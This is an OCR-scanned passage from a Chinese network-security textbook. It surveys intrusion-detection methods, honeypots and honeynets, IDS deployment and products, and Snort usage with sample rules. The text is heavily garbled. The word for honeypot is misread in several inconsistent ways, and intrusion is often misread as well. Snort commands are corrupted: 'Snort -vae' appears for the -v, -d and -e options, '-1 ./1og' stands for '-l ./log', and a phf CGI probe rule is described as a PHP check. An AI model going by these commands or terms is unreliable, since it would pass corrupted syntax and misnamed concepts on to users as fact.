一 组 任务 的 性 能 。 又 分 为 如 下 4 种: 

Q@ 基于 系统 调用 序列 分 析 。 通 过 学 习 系统 行为 来 识别 偏离 正常 状况 的 重要 行为 。 如 
将 人 类 免疫 系统 (human immune system) 原理 类 推 至 人 侵 检测 中 ,通过 分 析 在 固定 长 度 的 
系统 调用 序列 中 的 相关 性 ,产生 一 个 正常 轮廓 模型 。 当 某 调 用 序列 偏离 正常 轮廓 模型 时 , 即 
认为 受到 攻击 。 或 采用 滑动 窗口 技术 ,以 某 滑动 窗口 扫描 正常 的 系统 调用 序列 数据 ,产生 正 
常数 据 的 短 序 列 集合 ;然后 以 同样 的 方法 扫描 入 侵 数据 ,产生 一 组 短 序 列 , 在 正常 集合 中 查 
找 产生 的 每 个 序列 ,如 果 有 则 认为 属于 正常 ,否则 判 为 异常 。 

这 种 技术 的 缺点 : 对 于 每 个 系统 调用 都 要 进行 计算 ,降低 了 检测 系统 的 功效 ;由 于 系统 
调用 本 身 没有 规律 性 ,很 难 区 分 正常 系统 调用 和 异常 系统 调用 ,从 而 导致 较 高 的 误 报 率 。 

@ 贝 叶 斯 网 络 (Bayesian Networks)。 一 种 基于 概率 的 不 确定 性 推理 网 络 ,是 用 来 表示 
变量 集合 连接 概率 的 图 形 模型 ,提供 了 一 种 表示 因果 信息 的 方法 。 贝 叶 斯 网 络 方法 的 精确 
性 依赖 于 目标 系统 的 行为 模型 ,模型 不 准确 则 检测 也 将 不 准确 ,然而 对 于 系统 或 网 络 选 择 一 
个 准确 的 行为 模型 是 非常 困难 的 。 

@ 主 成 分 分 析 (Principal Components Analysis, PCA)。 主 成 分 分 析 是 构造 原 随机 变 
量 的 一 系列 线性 组 合 ,使 各 线性 组 合 彼此 不 相关 , 且 尽 可 能 地 反映 原 变量 的 信息 , 即 方差 最 
大 。 在 低 维 子 空间 表示 高 维 数据 ,使 得 在 误差 平方 和 的 意义 下 低 维 表示 能 够 最 好 的 描述 原 
始 数据 。 

@ 马尔 可 夫 链 模型 (Markov Models) 。 马 尔 可 夫 链 模型 可 以 用 来 表示 系统 的 正常 模 
式 , 通 过 对 系统 实际 观察 到 的 行为 分 析 ,推导 出 正常 模式 的 马尔 可 夫 链 模型 对 实际 行为 的 支 
持 程度 ,从 而 判断 异常 。 

(3) 基于 模式 预测 的 异常 检测 技术 

利用 时 间 规 则 描述 用 户 的 正常 行为 模式 ,利用 已 发 生 事件 对 未 来 事件 进行 预言 推理 。 
规则 通过 归纳 学 习 产 生 , 包 括 已 经 发 生 的 事件 ( 左 侧 ) 和 随后 发 生 的 事件 及 其 可 能 性 ( 右 侧 ) 
两 部 分 。 如 果 发 生 的 事件 与 某 个 规则 左 侧 相 匹 配 , 但 随后 的 行为 不 符合 (有 较 大 的 统计 偏 
离 ) 规 则 右 侧 的 预言 , 则 将 该 事件 看 作 是 入 侵 行 为 。 

该 方法 对 用 户 行为 的 变化 具有 较 好 的 适应 性 ;能 够 检测 到 在 IDS 预测 规则 学 习 时 期 试 
图 训练 系统 的 人 侵 者 ,具有 较 好 的 自身 防御 能 力 ,检测 速度 快 。 
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(4) 基于 遗传 算法 的 异常 检测 技术 

利用 遗传 编程 的 学 习 能 力 构建 基于 自治 代理 的 IDS, 使 用 自动 定义 功能 改进 遗传 编程 
对 单一 类 型 函数 的 依赖 性 ,使 其 能 在 确保 类 型 安全 的 同时 处 理 多 种 数据 类 型 。 可 以 作为 一 
个 训练 自治 代理 来 检测 入 侵 行 为 的 学 习 范 例 。 遗 传 算法 比 传统 搜索 方法 具有 更 强 的 鲁 棒 
性 ,可 以 提高 IDS 的 检测 效率 ,减少 错误 率 以 及 剔除 无 用 的 分 析 项 ,使 IDS 的 运行 时 间 得 到 
优化 。 

(5) 基于 免疫 系统 的 异常 检测 技术 

通过 区 分 自我 和 非 自我 识别 异常 模式 。 首 先 定义 系统 的 正常 模式 库 (Self 模式 库 ) ,而 
后 随机 产生 的 许多 模式 同 每 一 个 已 定义 的 Self 模式 进行 比较 , 若 匹 配 则 丢弃 ; 否则 将 其 作 
为 一 个 成 熟识 别 器 用 于 匹配 系统 中 将 出 现 的 异常 模式 。 

人 工 免疫 系统 是 研究 .借鉴 和 利用 生物 免疫 系统 (主要 是 指 人 类 的 免疫 系统 ) 各 种 原理 
和 机 制 而 发 展 的 各 类 信息 处 理 技术 .计算 技术 及 其 在 工程 和 科学 中 的 应 用 而 产生 的 各 种 智 

从 生物 的 免疫 系统 特点 出 发 可 以 发 现 ,入 侵 检 测 系统 与 免疫 系统 具有 本 质 的 相似 性 ; 
免疫 系统 负责 识别 生物 体 “ 自 身 (Self) ”和 *“ 非 自身 (Non-Self) ”的 细胞 ,清除 异常 细胞 。 入 侵 
检测 系统 则 辨别 正常 和 异常 行为 模式 。 生 物 免疫 系统 对 抗原 的 初次 应 答 类 似 于 入 侵 检 测 系 
统 异 常 检测 ,可 检测 出 未 知 的 抗原 。 生 物 免疫 系统 第 二 次 应 答 即 利用 对 抗原 的 “记忆 ”引发 
的 再 次 应 答 与 误 用 检测 相 类 似 。 利 用 生物 免疫 系统 的 这 些 特性 ,应 用 到 入 侵 检 测 领 域 ,能 有 
效 地 阻止 和 预防 对 计算 机 系统 和 网 络 的 入侵 行为 ,可 增强 信息 的 安全 性 。 

免疫 系统 从 整体 上 看 是 分 布 式 多 智能 体 的 协调 自治 系统 ,免疫 细胞 又 具有 防御 、 监 视 、 
维持 自 稳定 的 特点 。 免 疫 智能 体 (Immune Agent,IA) 除 了 一 般 Agent 的 共性 外 ,还 具有 进 
化 性 、 防 御 性 .记忆 性 和 耐 受 性 的 特点 。Agent 是 一 种 智能 化 的 自治 实体 ,具有 分 布 性 和 独 
立 性 的 特点 。 免 疫 多 Agent 人 侵 检测 模型 采用 多 Agent 的 分 布 式 分 层 结构 ,主要 实体 包括 
监理 器 IA 专 理 器 ,IA 和 用 户 接口 。 

(6) 基于 文件 完整 性 检查 的 异常 检测 技术 

通过 对 敏感 文件 和 目录 进行 加 密 核查 来 发 现 其 中 的 异常 变化 ,如 未 授权 的 软件 安装 、 入 
侵 后 留 下 的 后 门 和 系统 文件 破坏 等 。Tripwire 首先 扫描 整个 系统 ,并 基于 文件 系统 状态 和 
配置 文件 的 完整 性 核查 结果 建立 一 个 基准 数据 库 。 此 后 ,Tripwire 定期 对 当前 系统 进行 文 
件 完整 性 检查 ,并 将 结果 与 基准 数据 库 的 记录 进行 比较 , 若 不 符合 则 认为 出 现 完整 性 异常 。 

该 方法 采用 Hash 函数 和 信息 诊断 算法 进行 加 密 核查 ,可 对 入 侵 过 程 中 造成 的 文件 破 
坏 或 改动 做 出 有 效 的 检测 。 但 是 , 它 要 求 首次 核查 的 系统 必须 是 干净 的 。 另 外 ,系统 正常 的 
更 新 操作 可 能 带 来 大 量 的 文件 更 新 ,导致 基准 数据 库 的 重建 。 

(7) 基于 规范 的 异常 检测 技术 

建立 特权 程序 安全 预期 行为 的 规范 ,并 将 实际 审计 跟踪 记录 与 之 比较 ,判断 是 否 异常 。 
描述 特权 程序 中 有 关 安 全 的 正常 操作 序列 , 即 踪迹 (Trace) ,将 每 个 特权 程序 的 实际 操作 序 
列 与 其 预定 义 的 踪迹 进行 比较 ,如 不 相符 则 认为 是 入 侵 行为 ,这 被 称 为 踪迹 策略 (Trace 
Policy) 。 

(8) 基于 数据 挖掘 的 异常 检测 技术 

采用 各 种 特定 的 算法 在 海量 数据 中 发 现 有 用 的 可 理解 的 数据 模式 ,从 中 发 现 人 侵 检测 
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行为 。 主 体 技术 有 关联 分 析 .序列 分 析 、 分 类 、 聚 类 分 析 、 孤 立 点 分 析 和 基于 粗糙 集 挖掘 等 。 

人 基于 关联 分 析 的 人 侵 检 测 。 关 联 规则 描述 每 个 连接 记录 中 的 特征 属性 之 间 的 关系 ， 
即 一 个 事件 中 的 属性 之 间 的 关系 。 每 条 记录 包括 开始 时 间 ,连接 时 间 长 度 , 源 IP 地 址 .目的 
IP 地 址 、 源 端口 .目的 端口 .传送 字 节 数 和 TCP/IP 连接 状态 标志 等 。 挖 掘 的 任务 是 用 关联 
规则 来 描述 系统 的 模式 。 

@ 基于 序列 分 析 的 人 侵 检 测 。 序 列 分 析 分 析 数 据 间 的 前 后 因果 关系 , 它 够 挖掘 单个 安 
全 事件 之 间 的 先后 关系 ,从 中 提取 入 侵 行 为 的 时 间 序 列 特征 。 

@ 基于 数据 分 类 的 人 侵 检 测 。 分 类 就 是 建立 一 个 分 类 函数 或 分 类 模型 (分 类 器 ), 它 能 
够 把 数据 库 中 的 数据 映射 到 给 定 的 某 个 类 别 。 构 造 分 类 器 输入 训练 样本 数据 集 , 通 过 训练 
集中 数据 的 特性 ,寻找 一 种 准确 的 分 类 描述 .模型 和 规则 ,然后 用 这 个 分 类 规则 识别 其 他 数 
据 的 归属 或 类 别 。 

@ 基于 聚 类 分 析 的 人 侵 检 测 。 根 据 一 定 的 规则 ,对 一 组 未 分 类 的 安全 事件 进行 分 析 ， 
根据 分 类 分 析 预 先 给 出 的 分 类 规则 ,将 零碎 的 安全 事件 划分 为 描述 入 侵 行为 的 安全 事件 集 。 
常用 的 聚 类 分 析 包 括 分 裂 法 (K-MEANS、K-MEDOIDS) .层次 法 (BIRCH .CURE) 以 及 基于 
密度 、 基 于 网 格 、 基 于 模型 的 方法 等 。 

@ 基于 孤立 点 分 析 的 入侵 检 测 。 孤 立 点 数据 是 指 远离 数据 集聚 区 , 且 不 是 随机 偏差 ， 
而 是 产生 于 完全 不 同 的 机 制 的 数据 。 孤 立 点 数据 往往 预示 着 有 异常 活动 (入 侵 行为 ) 出 现 ， 
在 银行 ,保险 业 中 的 欺诈 检测 中 取得 了 良好 的 效果 。 

@ 基于 粗糙 集 理论 的 人 侵 检测 。 将 粗糙 集 理论 引入 到 入 侵 检测 中 ,只 需要 用 很 少 的 一 
部 分 正常 数据 作 训练 ,就 能 得 到 一 个 简单 的 预测 模型 ,高效 实时 地 检测 异常 情况 。 可 以 预 
见 ,粗糙 集 方法 在 入侵 检测 中 是 很 有 前 途 的 。 

5. 多 用 于 误 用 检测 的 入 侵 检测 技术 

用 于 误 用 检测 的 入 侵 检测 技术 包括 基于 条 件 概 率 误 用 入 侵 检测 、 基 于 专家 系统 误 用 入 
侵 检 测 、 基 于 状态 迁移 分 析 的 误 用 入 侵 检 测 、 基 于 键盘 监控 的 误 用 入 侵 检 测 和 基于 模型 的 误 
用 入 侵 检 测 等 。 

(1) 基于 专家 系统 的 网 络 人 侵 检测 技术 

基于 专家 系统 (Expert System) 的 人 侵 检测 技术 ,通常 是 针对 有 特征 的 入 侵 行为 的 基于 
规则 的 检测 , 即 根据 安全 专家 对 可 疑 行为 的 分 析 经 验 来 形成 一 套 推理 规则 ,然后 在 此 基础 上 
构成 相应 的 专家 系统 。 专 家 系统 既 能 用 于 异常 检测 ,又 能 用 于 误 用 检测 。 

不 同 的 系统 与 设备 具有 不 同 的 规则 , 且 规 则 之 间 往 往 不 具有 通用 性 。 专 家 系统 的 建立 
依赖 于 知识 库 的 完备 性 ,知识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 与 实时 性 。 通 常 专家 
系统 中 的 规则 以 if-then 的 语法 形式 表示 ,条 件 部 分 为 人 侵 特征 ,then 部 分 是 系统 防范 措施 。 
基于 专家 系统 的 人 侵 检测 对 环境 表现 得 比较 健壮 ,但 是 其 缺点 是 检测 系统 的 性 能 有 赖 于 训 
练 数据 的 质量 。 此 外 , 它 可 能 不 包括 所 有 可 能 的 正常 行为 模式 ,而 且 规则 必须 被 人 工 创建 。 

(2) 基于 模式 匹配 的 网 络 入 侵 检测 技术 

基于 模式 匹配 的 人 侵 检测 技术 也 像 专家 系统 一 样 ,也 需要 供给 行为 的 具体 知识 。 但 是 
攻击 方法 的 具体 描述 不 是 被 转换 为 抽象 的 检测 规则 ,而 是 将 已 知 的 入 侵 特征 编码 成 与 审计 
记录 相符 合 的 模式 ,因而 能 够 在 审计 记录 中 直接 寻找 相 匹配 的 已 知 入 侵 模式 ,而 不 需要 像 专 
家 系统 一 样 要 处 理 大 量 数据 ,从 而 大 大 提高 了 检测 效率 。 
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(3) 基于 状态 转换 分 析 的 网 络 人 侵 检测 技术 

基于 状态 转换 分 析 (State-Transition Analysis) 的 入 侵 检测 技术 是 将 状态 转换 图 应 用 
于 入侵 行 为 的 分 析 。 状 态 转换 法 将 入 侵 过 程 看 作 一 个 事件 序列 ,这 个 事件 序列 导致 系统 从 
初始 状态 转 入 被 人 侵 状 态 。 

这 种 技术 的 使 用 源 于 一 个 事实 , 即 所 有 入 侵 者 都 是 从 某 一 受 限 的 特权 程序 开始 来 探测 
系统 的 脆弱 性 以 获得 结果 。 分 析 时 首先 针对 每 一 种 人 侵 方法 确定 系统 的 初始 状态 和 被 人 侵 
状态 ,以 及 导致 状态 转换 的 转换 条 件 即 特征 事件 ,然后 用 状态 转换 图 来 表示 每 一 个 状态 和 特 
征 事 件 。 这 种 分 析 方法 可 以 减少 审计 事件 的 分 析 范 围 , 可 以 检测 协同 攻击 ,在 一 定 程度 上 可 
以 预测 下 一 步 的 攻击 方向 。 

基于 状态 转换 分 析 的 人 侵 检 测 技术 的 一 个 优势 是 状态 转换 是 直观 的 ,高 级 别 的 、 独 立 于 
审计 的 入侵 情节 的 表示 。 该 方法 允许 一 个 人 侵 情 节 的 部 分 表达 ,在 转换 图 中 使 用 标签 活动 
的 最 小 可 能 子 集 , 因 此 它 会 检测 到 相同 人 侵 的 不 同 变 体 。 它 具有 时 间 和 空间 扩展 性 。 但 是 
该 方法 的 状态 声明 和 标签 都 是 人 工 编码 ,不 利于 系统 检测 到 标签 库 以 外 的 攻击 。 

(4) 基于 模型 推理 的 网 络 入 侵 检测 技术 

攻击 者 在 攻击 一 个 系统 时 往往 采用 一 定 的 行为 程序 ,如 猜测 口令 的 程序 ,这 种 行为 程序 
构成 了 某 种 具有 一 定 行为 特征 的 模型 ,根据 这 种 模型 所 代表 的 攻击 意图 的 行为 特征 可 以 实 
时 地 检测 出 恶意 的 攻击 企图 。 用 基于 模型 推理 的 入 侵 检测 技术 ,人 们 能 够 为 某 些 行为 建立 
特定 的 模型 ,从 而 能 够 监视 具有 特定 行为 特征 的 某 些 活动 。 

(5) 基于 条 件 概率 的 网 络 入 侵 检测 技术 

条 件 概率 (Conditional Probability) 类 似 于 贝 叶 斯 统计 方法 ,不 同 之 处 是 这 里 的 条 件 是 
一 系列 的 事件 。 基 于 条 件 概 率 的 入 侵 检测 技术 是 在 概率 理论 基础 上 的 一 个 普遍 方法 。 它 是 
对 贝 叶 斯 方法 的 改进 。 这 种 方法 的 缺点 是 先 验 概率 比较 难以 给 出 ,而 且 事 件 的 独立 性 也 很 
难 满足 。 

6. 基于 Agent 的 入 侵 检 测 

采用 Agent 技术 进行 人 侵 检测 ,分 为 主机 Agent、 分 布 Agent 和 移动 Agent 等 检测 
系统 。 

7. 入 侵 检 测 的 新 技术 

包括 利用 生物 免疫 、 基 因 算法 ,数据 挖掘 和 密 镀 技术 等 的 入 侵 检 测 , 基 于 伪装 的 入 侵 检 
测 以 及 基于 智能 化 计算 的 入 侵 检 测 系统 。 

8. 其 他 IDS 

(1) 文件 完整 性 检查 系统 

文件 完整 性 检查 系统 检查 计算 机 中 上 次 检查 后 文件 变化 的 情况 。 文 件 完整 性 检查 系统 
保存 有 每 个 文件 的 数字 摘要 数据 库 , 每 次 检查 时 , 它 重 新 计算 文件 的 数字 摘要 并 将 它 与 数据 
库 中 的 值 相 比 较 , 若 不 同 , 则 说 明文 件 已 经 被 修改 ; 若 相 同 , 则 说 明文 件 未 发 生变 化 。 

(2) 日 志文 件 监视 

日 志文 件 通常 有 应 用 程序 日 志 、 安 全 日 志 、 系 统 日 志 、DNS 服务 器 日 志 、FTP 日 志和 
WWW 日 志 等 。 
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11.4 密 负 技术 


1. 蜜 缸 的 原理 

蜜 饶 (Honey Pot) 是 一 种 网 络 攻击 诱骗 工具 ,又 叫 网 络 陷阱 ,是 一 个 包含 有 漏洞 的 诱 
骗 系 统 , 它 通过 模拟 一 个 或 多 个 易 受 攻击 的 主机 ,给 攻击 者 提供 一 个 容易 攻击 的 目标 系 
统 。 蜜 把 不 向 外 界 提供 真正 有 价值 的 服务 ,而 是 吸引 入 侵 者 来 嗅 探 、 攻 击 ,同时 不 被 察觉 
地 将 黑客 的 活动 记录 下 来 ,进而 评估 黑客 攻击 的 目的 、 使 用 的 工具 .运用 的 手段 .造成 的 
后 果 。 蜜 铅 的 目的 是 引诱 攻击 ,拖延 对 真正 有 价值 目标 的 攻击 ;消耗 攻击 者 的 时 间 , 以 便 
收集 信息 ,获取 证 据 。 

通常 蜜 饶 部 署 在 容易 被 人 侵 者 发 现 的 地 方 , 辅 以 各 种 网 络 攻 击 诱骗 技术 来 诱 使 人 侵 者 
上 当 , 让 入 侵 者 误 以 为 已 经 成 功 侵入 网 络 系统 ,而 系统 则 完成 了 对 入 侵 者 的 攻击 过 程 的 记 
录 。 通 过 记录 可 以 分 析 、 学 习 黑 客人 侵 系统 所 使 用 的 工具 .采用 的 手段 .技术 和 意图 。 所 有 
与 蜜 饶 的 连接 尝试 都 被 视 为 可 疑 的 连接 。 

(1) 布置 安全 陷阱 。 蜜 饶 系 统 通常 位 于 受 保护 网 络 内 , 它 不 对 外 提供 IP 地 址 ,也 不 对 
外 提供 任何 网 络 服务 及 服务 接口 ,因此 任何 对 该 蜜 饶 主 机 的 连接 及 操作 都 可 以 认为 是 攻击 
的 发 生 。 蜜 钢 故 意 包含 一 些 漏洞 , 既 不 能 让 攻击 者 很 容易 识别 陷阱 ,也 不 能 对 攻击 者 完全 隐 
茂密 把 位置。 

(2) 诱骗 攻击 。 在 安全 设置 上 区 别 于 受 保护 的 主机 ,诱骗 攻击 者 只 对 蜜 护 攻击 而 暂时 
忽略 对 其 他 安全 主机 的 攻击 。 

(3) 记录 攻击 过 程 。 对 攻击 过 程 的 详细 跟踪 记录 来 实现 对 攻击 过 程 的 特征 提取 ,并 确 
保 蜜 饶 系 统 的 日 志 不 被 发 现 或 轻易 删除 。 

密 饶 技 术 对 系统 安全 起 到 了 以 下 作用 : 

(1) 黑客 会 攻击 虚假 的 网 络 而 忽略 真正 的 网 络 ; 

(2) 收集 黑客 的 信息 和 企图 ,帮助 系统 进行 安全 防护 和 检测 ,响应 ; 

(3) 消耗 黑客 的 精力 ,让 系统 管理 员 有 足够 的 时 间 去 响应 ; 

(4) 为 起 诉 留 下 证 据 。 

蜜 饶 具 有 数据 价值 高 .资源 消耗 少 . 设 计 和 配置 简单 等 优点 。 但 缺点 是 蜜 饶 的 视野 比较 
狭窄 .运行 时 容易 留 下 指纹 。 

2. 密 缸 分 类 与 实现 

蜜 镀 按 性 质 可 分 为 产品 型 蜜 钢 和 研究 型 蜜 镀 , 按 系 统 与 攻击 交互 的 频繁 程度 分 为 低 交 
互 密 钢 、 中 交互 密 钢 和 高 交互 蜜 镀 , 按 具 体 实现 分 为 物理 蜜 钢 和 虚拟 蜜 色 。 

蜜 钢 的 实现 主要 有 空 系统 、 镜 像 系 统 和 虚拟 系统 三 种 。 空 系统 是 一 种 没有 任何 虚假 和 
模拟 环境 的 完全 真实 的 计算 机 系统 ,但 是 有 真实 的 操作 系统 和 应 用 程序 ,也 有 真实 的 漏洞 ， 
会 很 快 被 攻击 者 发 现 不 是 期 待 的 目标 。 镜 像 系统 是 提供 Internet 服务 的 服务 器 镜像 系统 ， 
会 令 攻击 者 感到 真实 ,也 就 更 具有 欺骗 性 ,镜像 系统 的 破坏 不 影响 真实 系统 安全 。 虚 拟 系统 
使 用 多 台 虚 拟 机 ,构建 多 个 蜜 镀 主 机 。 虚 拟 系统 不 但 逼真 ,而且 成 本 较 低 ,资源 利用 率 较 高 ， 
即使 攻击 成 功 , 也 不 会 威胁 宿主 操作 系统 安全 。 

常用 的 蜜 饶 实 现 工具 有 Winetd、DTK(Deception Tool Kit) 和 Honeyd 等 。Winetd 安 
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装 简单 .界面 友好 ,适合 初学 者 使 用 。 但 过 于 简单 ,难以 真正 诱骗 攻击 者 进入 。DTK (可 以 
从 http://all. net/dtk 网 站 下 载 ) 是 用 C 语言 和 Perl 脚本 语言 写成 的 一 种 蜜 缸 工具 软件 ,能 
在 支持 C 语言 和 Perl 的 系统 (UNIX) 上 运行 ,能 够 监听 HTTP、FTP 和 Telnet 等 常用 服务 
器 所 使 用 的 端口 ,模拟 标准 服务 器 对 接收 到 的 请 求 所 做 出 的 响应 ,还 可 以 模拟 多 种 常见 的 系 
统 漏洞 。 不 足 之 处 是 模拟 不 太 允 真 ,构建 过 程 麻烦 。Honeyd (可 以 从 http://www. citi 
umich. edu/u/provos/honeyd 网 站 下 载 ) 是 一 个 专用 的 蜜 负 构 建 软件 ,可 以 虚拟 多 种 主机 ， 
配置 运行 不 同 的 服务 和 操作 系统 。 

3. 蜜 网 技术 

蜜 网 (Honey Net) 技 术 也 称 为 陷阱 网 络 技术 , 它 由 多 个 蜜 缸 主机 、 路 由 器 .防火墙 .IDS 
和 审计 系统 等 组 成 ,为 攻击 者 制造 一 个 攻击 环境 , 供 防御 者 研究 攻击 者 的 攻击 行为 。 蜜 网 发 
展 经 历 三 代 , 分 别 如 图 11. 12 一 图 11. 14 所 示 。 


Windows 


机 


Linux 


图 11.13 第 二 代 蜜 网 
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虚拟 系统 | 虚拟 系统 “ 虚拟 系统 
Internet 
宿主 机 系统 


图 11.14 第 三 代 蜜 网 


实现 蜜 网 的 工具 可 以 从 网 址 http://project. honeynet. org 下 载 ,包括 数据 控制 
Jptable .snort_inline, 数 据 捕 获 Termlog .Sebek2 .Snort 和 Comlog ,数据 收集 Obfugator, 数 
据 分 析 Privmsg、TASK 和 WinInterrogate 等 。 


11.5 人 侵 检 测 系统 的 部 署 和 产品 


11.5.1 IDS 部 署 


IDS 部 署 的 基本 原则 是 探测 器 的 位 置 必须 看 到 所 有 的 数据 包 。 基 于 主机 的 IDS 部 署 在 
受 监控 主机 上 ,但 会 消耗 主机 有 限 的 资源 ,如 黑 冰 BlackICE。 基 于 网 络 的 或 分 布 式 IDS 主 
要 是 探测 器 的 部 署 。 探 测 器 部 署 位 置 一 般 放 在 边界 防火 墙 之 内 ,边界 防火 墙 之 外 .主要 的 网 
络 中 枢 、 一 些 安全 级 别 需 求 高 的 子 网 里 ,可 以 直接 连接 保护 域 的 交换 机 、 路 由 器 或 防火 墙 , 如 
图 11. 15 所 示 ,探测 器 和 控制 台 并 接 于 受 保护 子 网 。 探 测 器 还 可 分 布 部 署 ,如 图 11. 16 


sp 


和 全 交换 机 防火 墙 路 由 器 
图 11.15 IDS 部 署 


防火 墙 防火 墙 
探测 器 
@ 0 @ 
探测 器 探测 器 探测 器 


图 11.16 基于 网 络 的 入 侵 检 测 器 的 部 署 


11.5.2 入 侵 检 测 系 统 产 品 
常用 知名 的 IDS 产品 有 赛 门 铁 克 Intruder Alert 3.6,Cisco Secure 入 侵 检测 系统 ,清华 
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得 实 NetDT(r)2000 入 侵 检 测 系 统 ,东方 龙马 NetEye 2.0 IDS, 中 科 网 威 “ 天 眼 ” 入 侵 侦 测 系 
统 , 安 氏 领 信 IDS 分 布 式 监控 ,中 联 绿 盟 * 冰 之 眼 ?IDS, 瑞 星 RIDS-100 捕获 内 外 数据 ,方正 
方 通 网 络 狙击 手 Found Sniper, 天 阅 黑 客人 侵 检 测 与 预警 系统 等 。 如 图 11. 17 一 图 11. 19 
所 示 , 分 别 为 中 科 网 威 “天 眼 ”、 方 正方 通 网 络 狙击 手 和 天 阅 黑 客 IDS 的 应 用 部 署 。 


Windows 主 机 
天 眼 引擎 3 路 由 器 
天 了 眼 控 


其 他 主 


天 眼 引擎 1 


ee 其 他 服务 器 


天 眼 引擎 2 
图 11.17 中 科 网 威 * 天 眼 ” 入 侵 侦 测 系统 


Found Sniper 


控制 中 心 Internet 


Found Sniper 


图 11.18 方正 方 通 网 络 狙击 手 Found Sniper 


“ 冰 之 眼 ”" 是 NSFOCUS 系列 安全 软件 中 的 一 款 企业 级 NIDS ,该 产品 可 以 自动 全 天 候 
地 监控 网 络 的 数据 流 、 主 机 的 日 志 等 ,对 可 疑 的 事件 给 予 检 测 和 响应 ,在 内 联网 和 外 联网 的 
主机 和 网 络 遭 受 破坏 之 前 阻止 非法 的 入 侵 行为 。 

天 阅 黑 客 入 侵 检 测 与 预警 系统 是 一 种 动态 的 入 侵 检测 与 响应 系统 , 它 利用 全 面 流量 监 
控 发 现 异常 ,定位 入侵 事件 地 理 信息 ;可 以 实时 监控 网 络 传输 、 自 动 检测 可 疑 行 为 .及 时 发 现 
来 自 网 络 外 部 或 内 部 的 攻击 ;应 用 入 侵 和 漏洞 之 间 的 对 应 关联 关系 ,给 出 入 侵 威 胁 和 资产 脆 
弱 性 之 间 的 风险 分 析 结 果 ; 有 效 地 管理 安全 事件 并 及 时 处 理 和 响应 。 
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图 11.19 天 阅 黑 客 入侵 检 测 与 预警 系统 
11.5.3 入侵 检测 产品 的 评估 


一 个 IDS 系统 的 优 劣 一 般 从 以 下 几 个 方面 进行 评估 : 

(1) 能 否 保 证 自身 的 安全 。 

(2) 运行 与 维护 系统 的 开销 。 

(3) 入 侵 检测 系统 报警 准确 率 (或 漏 报 和 误 报 率 ) 。 

(4) 网 络 入 侵 检 测 系统 负载 能 力 以 及 可 支持 的 网 络 类 型 。 

(5) 支持 的 入 侵 特征 数 和 升级 能 力 及 方便 性 。 

(6) 是 否 支 持 IP 碎片 重组 ;能 重组 的 最 大 IP 分 片 数 ;能 同时 重组 的 IP 包 数 ;能 进行 重 
组 的 最 大 IP 数据 包 的 长 度 。 

(7) 是 否 支 持 TCP 流 重组 。 


11.5.4 入 侵 检 测 系统 实例 一 一 Snort 


Snort 是 一 款 轻 量 级 的 网 络 人 侵 检测 系统 ,能 够 在 IP 网 络 上 进行 实时 的 流量 分 析 和 数 
据 包 记录 。 它 不 仅 能 进行 协议 分 析 、 内 容 检索 和 内 容 匹 配 ,而 且 能 用 于 侦 测 诸如 缓冲 溢出 、 
隐秘 端口 扫描 ,CGI 攻击 .SMB 探测 、 操 作 系 统 指纹 识别 等 大 量 的 攻击 或 非法 探测 。 它 具有 
易于 配置 ,检测 效率 高 的 特点 。Snort 具有 实时 的 流量 分 析 和 IP 数据 包 日 志 分 析 能 力 , 能 
够 对 协议 进行 分 析 或 对 内 容 进 行 实时 搜索 。Snort 能 够 检测 不 同 的 攻击 行为 ,如 缓冲 区 溢 
出 攻击 、 端 口 扫 描 和 拒绝 服务 攻击 等 ,并 实时 地 报警 。 

1. Snort 的 体系 结构 


Snort 由 包 解 码 器 探测 引擎 .日志 及 告警 系统 组 成 。 包 解码 器 为 探测 引擎 准备 数据 。 
探测 引擎 按照 启动 时 加 载 的 规则 ,对 每 个 数据 包 进 行 分 析 。 日 志 负 责 将 包 解码 器 收集 到 的 
信息 以 可 读 的 格式 或 以 tcpdump 格式 记录 ,告警 组 件 将 报警 信息 发 送 到 syslog、 文 本 文件 、 
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UNIX 套 接 字 或 数据 库 。 
2. Snort 的 运行 
Snort 的 运行 有 了 嗅 探 .数据 包 记录 器 和 和 人 侵 检测 三 种 模式 。 
嗅 探 模式 可 以 捕获 应 用 层 数据 包 .TCP IP 数据 包 和 链 路 层 数据 包 。 命 令 为 : 


Snort -vae 


三 个 参数 可 以 单独 使 用 ,其 中 - v 输 出 IP.TCP/UDP/ICMP 的 包头 信息 ;-d 显示 包 的 
数据 信息 ;-e 显示 IP/TCP/UDP/ICMP 包头 信息 ,包括 数据 信息 和 数据 链 路 层 信息 。 
数据 包 记录 器 模式 可 以 将 捕获 的 包 信息 记录 到 硬盘 上 指定 日 志 的 目录 。 命 令 为 ， 


Snort -dev -1 ./1og -h 192.168.10.0/24。 


-参数 设置 主 网 络 地 址 ;-1 指定 输出 目录 ,一般 以 数据 包 目 的 主机 的 IP 地 址 命名 记录 
的 文件 或 文件 夹 , 每 个 文件 夹 记录 的 是 和 该 外 部 主机 相关 的 网 路 流量 。 

和信 侵 检 测 模式 使 用 snort. conf 中 的 规则 集 进行 匹配 ,如 符合 规则 就 采取 规则 所 指定 的 
动作 。 命 令 为 : 

Snort -dev -1 ./ log -h 192.168.10.0/24 -c snort .conf 


-c 表示 规则 库 。 

3. Snort 的 规则 

Snort 规则 由 规则 头 和 规则 选项 构成 。 规 则 头 包 括 行动 协议、 源 /目的 地 址 、 子 网 掩 码 
以 及 源 /目的 端口 。 

规则 的 行动 有 Pass( 放 行 ) ,log( 把 数据 包 记录 到 日 志文 件 ) 和 alert( 产 生 报警 消息 并 记 
录 数 据 包 日 志 )。 规 则 选项 包括 报警 消息 和 异常 包 的 信息 (特征 码 ) ,使 用 这 些 特征 码 来 决定 
是 否 采 取 规 则 规定 的 行动 。 例 

规则 1; Log tcp any any- 二 10. 10. 1. 0/24 79 

让 snort 记录 从 外 部 网 络 到 C 类 网 址 10. 10. 1. 0 ,端口 为 79 的 所 有 数据 包 。 

规则 2; Alert tcp any any ->10. 10. 1. 0/24 80(content: "/cgi-bin/phf"; msg: "phf 
probe!";) 

检测 对 本 地 网 络 Web 服务 器 (端口 80) 的 PHP 服务 的 探测 ,一 旦 检测 到 这 种 探测 数据 
包 ,Snort 就 发 出 报警 消息 ,并 把 整个 探测 报 记录 到 日 志 。 

4. 构建 完整 的 Snort 系统 

Snort 的 安装 和 配置 有 两 种 选择 ,一 种 是 只 安装 Snort; 另 一 种 是 安装 Snort 的 同时 安装 
其 他 的 工具 软件 ,从 而 搭建 一 个 完整 的 Snort 系统 。 

在 第 一 种 安装 方式 下 ,Snort 会 将 捕捉 到 的 入 侵 检 测 数据 以 文本 或 二 进 制 的 形式 保存 
